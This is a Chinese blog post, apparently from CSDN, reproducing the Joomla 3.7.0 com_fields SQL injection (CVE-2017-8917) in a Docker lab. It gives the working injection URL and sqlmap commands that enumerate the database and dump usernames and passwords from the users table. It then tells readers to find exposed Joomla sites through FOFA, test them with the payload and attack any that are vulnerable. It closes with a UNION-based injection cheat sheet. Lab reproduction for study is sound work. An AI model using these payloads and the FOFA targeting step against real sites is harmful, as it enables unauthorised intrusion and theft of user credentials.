Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现

已于 2024-03-02 22:47:52 修改
阅读量1.2k 收藏 8
点赞数 1
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 网络安全
于 2023-09-01 17:40:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42786460/article/details/132627425
版权

文章目录

一 漏洞库环境

https://vulapps.evalbug.com

二 下载Joomla3.7.0 sql注入环境

https://vulapps.evalbug.com/j_joomla_2/
2.1 获取环境
	拉取镜像到本地
	$ docker pull medicean/vulapps:j_joomla_2
	
	启动环境-不建议直接启动-对docker镜像源进行管理后再执行
	$ docker run -d -p 8000:80 medicean/vulapps:j_joomla_2
2.2 查看docker镜像文件
$ sudo docker images
3 使用docker管理插件
docker-compose  -v

/var/lib/docker  # docker目录

在这里插入图片描述

三 寻找docker靶场依赖文件参考进行复制

1 参考tomcat8的docker配置文件
cd  /home/kali/vulhub/tomcat/tomcat8 
cat docker-compose.yml

在这里插入图片描述
在这里插入图片描述

2 文件:docker-compose.yml
version: '2'
services:
 tomcat:
   image: vulhub/tomcat:8.0
   volumes:
    - ./tomcat-users.xml:/usr/local/tomcat/conf/tomcat-users.xml
    - ./context.xml:/usr/local/tomcat/webapps/manager/META-INF/context.xml
    - ./context.xml:/usr/local/tomcat/webapps/host-manager/META-INF/context.xml
   ports:
    - "8080:8000"   
    
 # 前面8080端口是--》对外映射端口   2.后面端口8000是docker容器端口
3 修改配置docker镜像文件

参考上面的文件/home/kali/vulhub/tomcat/tomcat8/docker-compose.yml,在用戶家目录下[~/vulhub]新建奇【joomla】文件目录–》 docker-compose.yml这个文件进行管理

┌──(kali💋kali)-[~/vulhub/joomla/joomla_3.7.0_sqli_cve-2017-8917]
└─$ vim docker-compose.yml   

version: '2'   # 自己docker的版本
services:
 joomla_3.7.0:  # 自己定义的服务名
   image: medicean/vulapps:j_joomla_2  # 镜像源
   ports:
    - "8088:80"   # 前面8088端口是--》对外映射端口   2.后面端口80是容器端口

在这里插入图片描述

4 启动镜像-文件配置好后
sudo docker-compose up -d   # -d是后台运行

在这里插入图片描述

5 关闭镜像
sudo docker-compose down    # 关闭镜像自动删除容器

在这里插入图片描述

6 访问

查看kali的eth0网卡ip进行访问
在这里插入图片描述

7 已访问通

在这里插入图片描述

四 不使用docket容器管理启动停止服务

$ sudo  docker run -d -p 8000:80 medicean/vulapps:j_joomla_2

sudo  docker ps -a  # 查看docker的启动服务

sudo docker stop f30    #f30是docker容器id的缩写

在这里插入图片描述

五 启动成功后去漏洞库寻找漏洞复现指令

1 peiqi漏洞库
https://peiqi.wgpsec.org/wiki/cms/   # 漏洞库地址寻找joomla

在这里插入图片描述

2 白阁漏洞库

peiqi漏洞沒有joomla漏洞–》再去白阁漏洞库

https://wiki.bylibrary.cn/   # 漏洞库地址

启动后访问http://your-ip:8080即可看到Joomla的安装界面 按照顺序安装即可 安装完成后,访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

在这里插入图片描述
在这里插入图片描述

3 vulhub漏洞环境库
https://vulhub.org/#/environments/   # vulhub漏洞地址

http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

在这里插入图片描述
在这里插入图片描述

六 访问地址-漏洞复现成功

在这里插入图片描述

七 深度利用漏洞

1 漏洞指令
http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
2 使用sqlmap进行扫描
#1. 如果沒有sqlmap情況-执行
┌──(kali💋kali)-[~/tools]
└─$ sudo python3 sqlmap.py -u "http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]"  

#2.如果已經按裝sqlmap-执行
┌──(kali💋kali)-[~/tools]
└─$ sudo  sqlmap -u "http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" 

# -p是参数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3 sqlmqp扫描出的sql注入的漏洞

在这里插入图片描述

4 sqlmqp获取数据库名字
--current-db  参数是获取当前数据库的名字

┌──(kali💋kali)-[~/tools]
└─$ sudo  sqlmap -u "http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]"  --current-db

在这里插入图片描述

5 sqlmqp显示当前数据库名称

在这里插入图片描述

6 获取表名字
-D "joomla" --tables #参数是获取数据库表名字

┌──(kali💋kali)-[~/tools]
└─$ sudo  sqlmap -u "http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]"  -D "joomla" --tables

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

7 sqlmap获取某表列名
-D "joomla" -T "#_users" --columns #参数是获取数据库user表所有列

┌──(kali💋kali)-[~/tools]
└─$ sudo  sqlmap -u "http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]"  -D "joomla" -T "#_users" --columns

在这里插入图片描述

7.1选择Y,进行爆破

在这里插入图片描述
在这里插入图片描述

7.3 输入线程10

在这里插入图片描述
在这里插入图片描述

8 获取用户名和密码
-D "joomla" -T "#_users" -C "username,password" --dump #参数是获取数据库user表用戶和密码列

┌──(kali💋kali)-[~/tools]
└─$ sudo  sqlmap -u "http://192.168.225.166:8088/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]"  -D "joomla" -T "#_users" -C "username,password" --dump

在这里插入图片描述

在这里插入图片描述

八 漏洞复现后-搜索漏洞相关的资产

1 登录fofa
https://en.fofa.info/  # fofa网址

在这里插入图片描述

2 搜索语法:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3 根据查詢的资产地址

打开资产地址使用漏洞语句测试,查看是否有漏洞-有漏洞在用工具
在这里插入图片描述

九 sql注入使用汇总

9.1 sql注入字段参数
MySQL 5.0以上自带数据库information_schema,存储所有数据库名、表名、列名信息:

information_schema.schemata:记录数据库名信息的表
information_schema.tables:记录表名信息的表
information_schema.columns:记录列名信息的表
schema_name: information_schema.schemata记录数据库名的列名值

table_ schema: information_schema.tables记录数据库名的列名值
table_name: information_schema.tables记录表名的列名值
column_name: information_schema.columns记录列名的列名值
9.2 整体使用思路
1.判断注入点
	id=1 and 1=1
2.order判断列数(长度超了报错)
	id=1 order by 2
3.查库名
	id=1 union select version(),database()
	select variable, set_time from sys_config where 1 !=1  union select version(), user();
4.查表名
    id=1 union select 1,table name from
    information_schema.tables where table_schema='pikachu'
5.查列名
    id=1 union select 1,column_name from
    information_schema.columns where table_name='users' and
    table_schema='pikachu'
6.查值
	union select username,password from users
煜磊
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE 2017-8917 Joomla3.7 Core com_fields组件sql注入漏洞复现
BROTHERYY的博客
10-19 2346
1. 漏洞描述 漏洞编号: CVE-2017-8917 危害等级:危急 漏洞简述:本漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入sql注入对导致数据库中的敏感信息泄漏。 影响版本: Joomla!3.7.0 Core 2. 漏洞介绍 这个漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql 注入,sql注入对导致数据库中的敏感信息泄
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞
huayimy的博客
12-30 1057
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞,com_fields组件,启动docker,安装mysql数据库
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
weixin_45653478的博客
05-17 471
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞CVE-2017-8917),攻击者可以利用该漏洞数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
Joomla未授权访问漏洞|CVE-2023-23752复现及修复
szgyunyun的博客
03-16 2598
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
Joomla未授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 2992
漏洞复现
Joomla存在未授权访问漏洞CVE-2023-23752】
holyxp的博客
06-27 561
Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857,又称为“Joomla SQL注入漏洞”,是由于Joomla在处理特定的用户输入时,没有进行足够的数据验证和过滤,导致恶意用户可能通过构造恶意请求来执行SQL命令。这个漏洞主要影响Joomla 3.2.0至3.2.3版本,...
Joomla_3.7.0-Stable-Full_Package.zip
04-29
CVE-2017-8917是一个具体的漏洞,可能涉及到Joomla CMS的某个安全问题,可能是SQL注入、跨站脚本攻击或其他类型的网络安全威胁。用户被鼓励下载并分析这个包,以了解如何识别和修复此类安全漏洞。 在提供的标签中,...
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
WooYun_Bugs(漏洞库)、Qingy安全漏洞库、佩奇PeiQi-WIKI-POC漏洞库、yougar0等漏洞
06-07
WooYun_Bugs(漏洞库)、Qingy安全漏洞库、佩奇PeiQi-WIKI-POC漏洞库、yougar0等漏洞库几10个G左右(如有侵权联系删除,分享资源仅用于教学和交流)
CVE2021-23132
03-27
Joomla RCE(CVE2021-23132)。 com_media允许的路径,不适用于将图像上载到RCE。 在Joomla中发现了一个被分类为严重的漏洞! 3.0.0至3.9.24(内容管理系统)。 此问题影响组件com_media的未知功能。 使用未知输入...
Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917
weixin_51387754的博客
12-01 1029
漏洞简介 com_fields组件出现漏洞,com_fields组件是在3.7版本添加的,如果你使用此版本,将受到影响,并应尽快更新。这个组件可以公开访问,意味着任何能访问你站点的用户都可以发起攻击 漏洞复现 (root????guiltyfet)-[/home/guiltyfet/vulhub/joomla] └─# cd CVE-2017-8917 ┌──(root????guiltyfet)-[/home/guiltyfet/vulhub/joomla/CVE-2017-8917] └─# dock
Joomla内核SQL注入漏洞CVE-2018-8045)
huayimy的博客
12-30 572
Joomla内核SQL注入漏洞CVE-2018-8045),登录账号密码后会显示报错
Joomla-3.7.0
cgjil的博客
09-09 154
这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。3.7.0搭建][https://vulapps.evalbug.com/j_joomla_2/]根据以下链接进行搭建。
Joomla Rest API 未授权访问漏洞CVE-2023-23752)POC、漏洞复现
wfzshi666的博客
02-22 537
CVE-2023-23752漏洞复现
使用JoomScan扫描Joomla中的漏洞
xiaoma920的博客
05-06 443
扫描结束时,joomScan会显示出存储扫描结果的文件的所在路径,扫描结果一般存储在/usr/share/joomscan/reports/192.168.17.137。如下图示,这里靶机OWASP BWA的IP地址是192.168.17.137,网站的网址是:http://192.168.17.137。实验时要看清楚自己靶机的地址。上图中,扫描结果中给出了Joomlia的版本,漏洞类型、CVE编号,以及一些对渗透测试人员非常有用的信息,比如可以利用的公开漏洞
(自用POC)Joomla-CVE-2023-23752
qq_50854662的博客
03-13 247
(自用POC)Joomla-CVE-2023-23752
mysql漏洞2017,Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析
06-01
MySQL漏洞2017指的是MySQL数据库2017年发现的一个安全漏洞,该漏洞允许攻击者通过在MySQL服务器上注入恶意代码来获取数据库中的敏感信息或者执行恶意操作。 Joomla! 3.7 Core SQL注入漏洞(CVE-2017-8917)是一个影响Joomla! CMS的安全漏洞,该漏洞允许攻击者通过在搜索模块中注入恶意SQL代码来获取网站的敏感信息或者执行恶意操作。 该漏洞的原因是由于Joomla! CMS的搜索模块没有对用户输入进行充分验证和过滤,导致攻击者可以在搜索框中注入恶意代码。攻击者可以使用这个漏洞来执行SQL查询,访问和修改数据库中的数据。 为了修复这个漏洞Joomla! CMS发布了一个补丁程序,该程序在搜索模块中添加了额外的输入验证和过滤,以防止攻击者注入恶意代码。 对于使用Joomla! CMS的网站管理员来说,他们应该及时更新到最新版本,以确保自己的网站不会受到这个漏洞的影响。同时,他们也应该定期检查和审计自己的网站,以及对用户输入进行充分验证和过滤,从而减少安全漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值